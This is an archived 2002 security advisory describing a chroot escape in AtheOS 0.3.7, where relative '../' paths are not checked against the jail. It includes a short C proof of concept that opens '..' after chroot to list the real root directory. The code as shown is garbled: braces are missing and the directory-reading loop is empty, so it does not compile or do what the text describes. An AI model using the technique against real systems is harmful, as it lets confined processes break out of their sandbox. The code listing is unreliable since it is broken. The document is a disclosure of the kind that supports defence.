TUCoPS :: Unix :: Various Flavours :: misc5081.htm

AtheOS chroot escape
8th Feb 2002 [SBWID-5081]

	AtheOS chroot escape


	AtheOS version 0.3.7


	Frank DENIS \'Jedi/Sector One\' [http://www.Jedi.Claranet.Fr] posted :

	After a chroot() call on AtheOS, \'/\' indeed seems to become  the  base
	directory.       \'/path/to/file\'        is        translated        to
	\'<directory>/path/to/file\' .

	Unfortunately,  relative  paths  aren\'t  checked  against  the  current
	chroot jail. Therefore, \'../../../../path/to/file\' will be  translated
	to a file out of the chroot limits.

	The following code will read the content of the  real  \'/\'  directory,
	while \'/tmp\' is supposed to be the base of the chroot jail.

	#include <stdio.h>

	#include <unistd.h>

	#include <dirent.h>


	int main(void)


	    register DIR *d;

	    register const struct dirent *e;


	    if (chdir(\"/\") || chroot(\"/tmp\") || chdir(\"/\") ||

	        (d = opendir(\"..\")) == NULL) {

	        return 1;


	    while ((e = readdir(d)) != NULL) {



	    return 0;




	None yet. Check  : [http://www.atheos.cx]

TUCoPS is optimized to look best in Firefox® on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2024 AOH